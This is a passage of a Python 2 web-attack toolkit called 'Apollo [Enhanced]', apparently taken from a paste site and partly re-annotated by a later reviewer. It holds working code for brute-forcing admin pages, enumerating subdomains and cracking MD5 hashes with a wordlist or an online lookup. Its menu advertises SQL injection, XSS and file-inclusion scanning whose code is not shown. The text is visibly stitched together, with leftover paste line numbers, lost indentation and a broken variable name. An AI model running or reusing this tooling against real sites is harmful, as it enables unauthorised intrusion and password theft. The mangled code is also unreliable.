            'ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']

    # Plain string concatenation: no check that site ends with '/'.
    for add in dirs:
        test = site + add
        queue.put(test)

    # join() returns only when every item has had task_done(); a worker that
    # dies on an unexpected exception leaves this call blocked.
    for i in range(20):
        thread = Atest(queue)
        thread.setDaemon(True)
        thread.start()
    queue.join()
  691.  
def aprint():
    """Print results of admin page scans"""
    # Reports the module-level `found` list filled by Atest workers. O/G/W
    # colour codes are not defined anywhere in this excerpt -- verify they
    # exist, otherwise the per-site print raises NameError.
    print 'Search Finished\n'
    if len(found) == 0:
        print '-[!]- No pages found'
    else:
        for site in found:
            print O+'-[!]- Found: ' + G+site+W
  700.  
  701.  
class SDtest(threading.Thread):
    """Checks given Domain for Sub Domains"""
    # NOTE(review): indentation was lost on the source page; nesting below is
    # reconstructed -- confirm against the original file.
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue

    def run(self):
        """Checks if Sub Domain responds"""
        # A name counts as found only if an HTTP request to it succeeds
        # without urllib2.URLError; names that resolve but serve no HTTP (or
        # answer 4xx/5xx, since HTTPError is a URLError subclass) are dropped
        # silently. Exceptions other than URLError -- including a
        # socket.gaierror from gethostbyname() in the else branch -- escape
        # the loop, end the thread and skip task_done(), so queue.join() in
        # subd() never returns. No timeout is set.
        while True:
            try:
                domain = self.queue.get(False)
            except Queue.Empty:
                break
            try:
                site = domain
                # `domain` is a bare host name; urllib2.Request expects a URL with
                # a scheme -- presumably the operator types 'http://...'? Verify
                # what subd() builds, since check + '.' + site has no scheme.
                conn = urllib2.Request(site)
                conn.add_header('User-Agent', choice(USER_AGENT))
                opener = urllib2.build_opener()
                opener.open(conn)
            except urllib2.URLError:
                self.queue.task_done()
            else:
                target = socket.gethostbyname(domain)
                print 'Found: ' + site + ' - ' + target
                self.queue.task_done()
  727.  
  728.  
def subd():
    """Create queue and threads for sub domain scans"""
    # Prefixes each entry of a fixed label list to the typed domain and lets
    # 20 SDtest workers request them. The list contains a duplicate ("admin"
    # appears twice), so that name is checked twice. The operator input is
    # not validated.
    # NOTE(review): indentation was lost on the source page; reconstructed.
    queue = Queue.Queue()
    site = raw_input('Domain: ')
    sub = ["admin", "access", "accounting", "accounts", "admin", "administrator", "aix", "ap", "archivos", "aula", "aulas", "ayuda", "backup", "backups", "bart", "bd", "beta", "biblioteca",
           "billing", "blackboard", "blog", "blogs", "bsd", "cart", "catalog", "catalogo", "catalogue", "chat", "chimera", "citrix", "classroom", "clientes", "clients", "carro",
           "connect", "controller", "correoweb", "cpanel", "csg", "customers", "db", "dbs", "demo", "demon", "demostration", "descargas", "developers", "development", "diana",
           "directory", "dmz", "domain", "domaincontroller", "download", "downloads", "ds", "eaccess", "ejemplo", "ejemplos", "email", "enrutador", "example", "examples", "exchange",
           "eventos", "events", "extranet", "files", "finance", "firewall", "foro", "foros", "forum", "forums", "ftp", "ftpd", "fw", "galeria", "gallery", "gateway", "gilford",
           "groups", "groupwise", "guia", "guide", "gw", "help", "helpdesk", "hera", "heracles", "hercules", "home", "homer", "hotspot", "hypernova", "images", "imap", "imap3", "imap3d",
           "imapd", "imaps", "imgs", "imogen", "inmuebles", "internal", "intranet", "ipsec", "irc", "ircd", "jabber", "laboratorio", "lab", "laboratories", "labs", "library", "linux", "lisa", "login", "logs", "mail", "mailgate", "manager", "marketing", "members", "mercury", "meta", "meta01", "meta02", "meta03", "miembros", "minerva", "mob", "mobile", "moodle", "movil",
           "mssql", "mx", "mx0", "mx1", "mx2", "mx3", "mysql", "nelson", "neon", "netmail", "news", "novell", "ns", "ns0", "ns1", "ns2", "ns3", "online", "oracle", "owa", "partners", "pcanywhere",
           "pegasus", "pendrell", "personal", "photo", "photos", "pop", "pop3", "portal", "postman", "postmaster", "private", "proxy", "prueba", "pruebas", "public", "ras", "remote", "reports", "research",
           "restricted", "robinhood", "router", "rtr", "sales", "sample", "samples", "sandbox", "search", "secure", "seguro", "server", "services", "servicios", "servidor", "shop", "shopping",
           "smtp", "socios", "soporte", "squirrel", "squirrelmail", "ssh", "staff", "sms", "solaris", "sql", "stats", "sun", "support", "test", "tftp", "tienda", "unix", "upload", "uploads",
           "ventas", "virtual", "vista", "vnc", "vpn", "vpn1", "vpn2", "vpn3", "wap", "web1", "web2", "web3", "webct", "webadmin", "webmail", "webmaster", "win", "windows", "www", "ww0", "ww1",
           "ww2", "ww3", "www0", "www1", "www2", "www3", "xanthus", "zeus"]

    # No scheme is added here; SDtest passes the result straight to
    # urllib2.Request, so the operator must type one -- verify.
    for check in sub:
        test = check + '.' + site
        queue.put(test)

    # join() blocks until every item has had task_done(); a worker that dies
    # on an unexpected exception leaves this call blocked.
    for i in range(20):
        thread = SDtest(queue)
        thread.setDaemon(True)
        thread.start()
    queue.join()
  756.  
  757.  
  758. class Cracker(threading.Thread):
  759. """Use a wordlist to try and brute the hash"""
  760. def __init__(self, queue, hashm):
  761. threading.Thread.__init__(self)
  762. self.queue = queue
  763. self.hashm = hashm
  764.  
  765. def run(self):
  766. """Hash word and check against hash"""
  767. while True:
  768. try:
  769. word = self.queue.get(False)
  770. except Queue.Empty:
  771. break
  772. tmp = hashlib.md5(word).hexdigest()
  773. if tmp == self.hashm:
  774. self.result(word)
  775. self.queue.task_done()
  776.  
  777. def result(self, words):
  778. """Print result if found"""
  779. print self.hashm + ' = '+Words
  780.  
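def word():
    """Create queue and threads for hash crack.

    Prompts for a wordlist path and an MD5 hex digest, loads every line of
    the wordlist into a queue, starts five Cracker threads on it and blocks
    until the queue has been fully processed.
    """
    queue = Queue.Queue()
    wordlist = raw_input('Wordlist: ')
    # Cracker compares against hexdigest(), which is lowercase, so normalise
    # the user's input or an upper-case hash can never match.
    hashm = raw_input('Enter MD5 hash: ').strip().lower()
    # Context manager closes the file even if reading raises.
    with open(wordlist) as read:
        for words in read:
            # Strip CR as well as LF so a CRLF wordlist does not leave a
            # trailing '\r' on every candidate (which would never hash equal).
            queue.put(words.rstrip('\r\n'))
    for i in range(5):
        thread = Cracker(queue, hashm)
        thread.setDaemon(True)
        thread.start()
    queue.join()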
  796.  
  797.  
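class OnlineCrack:
    """Use online service to check for hash"""

    # Only a 32-digit hex string is accepted, so nothing but a well-formed
    # digest is ever spliced into the query URL.
    MD5_RE = re.compile(r'^[0-9a-fA-F]{32}$')

    def crack(self):
        """Connect and check hash.

        Prompts for an MD5 hex digest, validates its shape, sends one request
        to the lookup service and prints a message based on the body.
        Connection failures are reported instead of propagating.
        """
        hashm = raw_input('Enter MD5 Hash: ').strip()
        if not self.MD5_RE.match(hashm):
            print('\n-[!]- Not a valid MD5 hash (expected 32 hex digits)')
            return
        conn = urllib2.Request('http://md5.hashcracking.com/search.php?md5=%s' % (hashm))
        conn.add_header('User-Agent', choice(USER_AGENT))
        opener = urllib2.build_opener()
        try:
            # The original opened the request twice (one result discarded);
            # a single open/read/close is enough.
            resp = opener.open(conn)
            try:
                data = resp.read()
            finally:
                resp.close()
        except urllib2.URLError:
            print('\n-[!]- Error connecting')
            return
        if data == 'No results returned.':
            print('\n-[!]- Not found!')
        # NOTE(review): this compares the whole body with a fragment, so it
        # only fires when the response is exactly that text -- confirm against
        # the service's actual response format before relying on it.
        if data == 'Cleartext of':
            print('\n-[!]- %s' % (data))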
  813.  
  814.  
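class Check:
    """IP address Checker"""

    def grab(self):
        """Connect to site and grab IP.

        Fetches the tracemyip.org front page once, locates the IP by the
        same markers the original used and prints it. Any urllib2 failure
        (HTTPError is a subclass of URLError) prints an error instead of
        crashing, as does a page whose markup no longer contains the markers.
        """
        site = 'http://www.tracemyip.org/'
        try:
            conn = urllib2.Request(site)
            conn.add_header('User-Agent', choice(USER_AGENT))
            opener = urllib2.build_opener()
            # One request instead of the original's two (first result was discarded).
            resp = opener.open(conn)
            try:
                data = resp.read()
            finally:
                resp.close()
        except urllib2.URLError:
            print('-[!]- Error connecting')
            return
        start = data.find('onClick="')
        end = data.find('size=', start) if start != -1 else -1
        if start == -1 or end == -1:
            print('-[!]- Could not find the IP address in the page')
            return
        # NOTE(review): the +46 / -2 offsets are tied to the page markup of
        # the time the tool was written -- confirm they still line up.
        ip_add = data[start+46:end-2].strip()
        print(B+'\n-[!]- Your IP Address Is '+R+'%s' % (ip_add) +W)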
  837.  
  838.  
def output():
    """Outputs dork scan results to screen.

    Reads the module-level counters ``vuln``, ``invuln`` and ``np`` and the
    selected ``option``; for options 1-4 also names the result file.
    """
    print('\n>> ' + str(vuln) + G + ' Vulnerable Sites Found' + W)
    print('>> ' + str(invuln) + G + ' Sites Not Vulnerable' + W)
    print('>> ' + str(np) + R + ' Sites Without Parameters' + W)
    # NOTE(review): the main menu lists option 2 as XSS and 3 as LFI, while
    # the file names here are the other way round -- confirm against the
    # code that actually writes the result files.
    saved_to = {
        '1': 'sqli-result.txt\n',
        '2': 'lfi-result.txt',
        '3': 'xss-result.txt',
        '4': 'rfi-result.txt',
    }
    if option in saved_to:
        print('>> Output Saved To ' + saved_to[option])
  852.  
  853.  
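# ANSI SGR escape sequences used for the coloured terminal UI.
W = "\033[0m"   # reset to default colours
R = "\033[31m"  # red
G = "\033[32m"  # green
O = "\033[33m"  # yellow
B = "\033[34m"  # blue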
  859.  
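def main():
    """Outputs Menu and gets input.

    Prints the banner and option list, reads a choice with raw_input and
    dispatches to the matching feature; option 10 only prints the changelog.
    Empty or unknown input re-prompts after a short pause. The loop replaces
    the original's recursive ``main()`` call, so repeated bad input can no
    longer grow the stack. Sets the module-level ``option`` global, which
    ``output()`` (and presumably ``Crawl()``) read.
    """
    global option
    while True:
        print(O + '''
Apollo [Enhanced]
by madhatter

Original by Sotd
github.com/SotdCode/Apollo''')
        print(G + '''
-[1]- SQL Injection
-[2]- Cross Site Scripting
-[3]- Local File Incursion
-[4]- Remote File Incursion
-[5]- Admin Page Finder
-[6]- Sub Domain Finder
-[7]- Dictionary MD5 cracker
-[8]- Online MD5 cracker
-[9]- IP Address Checker
-[10]- See What Changed''')
        print(W)
        option = raw_input('-[!]- Enter Option: ')

        if not option:
            print(R + '\nYou Must Enter An Option\n' + W)
            time.sleep(0.5)
            continue

        if option in ('1', '2', '3', '4'):
            # The four dork scans all go through the crawler, which is
            # expected to pick the test from the ``option`` global.
            Crawl()
            output()
        elif option == '5':
            admin()
            aprint()
        elif option == '6':
            subd()
        elif option == '7':
            word()
        elif option == '8':
            OnlineCrack().crack()
        elif option == '9':
            Check().grab()
        elif option == '10':
            print(O + '''\n--- Changes Made in Enhanced Apollo ---''')
            print(G + '''
= Apollo now scan wider range of SQL DBs
---- MySQL [More errors]
---- MsSQL [More errors]
---- Oracle/JBDC
---- ODBC
---- OLEDB
---- JETDB
---- ADODB
---- ProgreSQL
---- Sybase
= XSS added evasion
= Removed paramiko, due to errors
= Added Color UI
= Added more admin pages''')
            print(O + '''\n--- Future Plans ---''')
            print(G + '''
= Random User Agent [WIP]
= TOR/Polipo [WIP]
= SSH tunnelling (better than paramiko)
= Online Proxy Grabber [WIP]
= More detail on IP [WIP]
= SQL Column Counter [WIP]
= Persistent XSS finder
= XSS finder with manual options
= SQLi with manual options''')
            print(B + '''\n## Contact at [email protected] ##''')
            print(W)
        else:
            print(R + '\nInvalid Choice\n' + W)
            time.sleep(0.5)
            continue
        return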
  956.  
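if __name__ == '__main__':
    main()
# The original followed this with ``elif conf.get("threads", 0) > 1: os._exit(0)``;
# neither ``conf`` nor ``os`` is defined in this file, so merely importing the
# module raised NameError. Dropped as dead, broken code.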
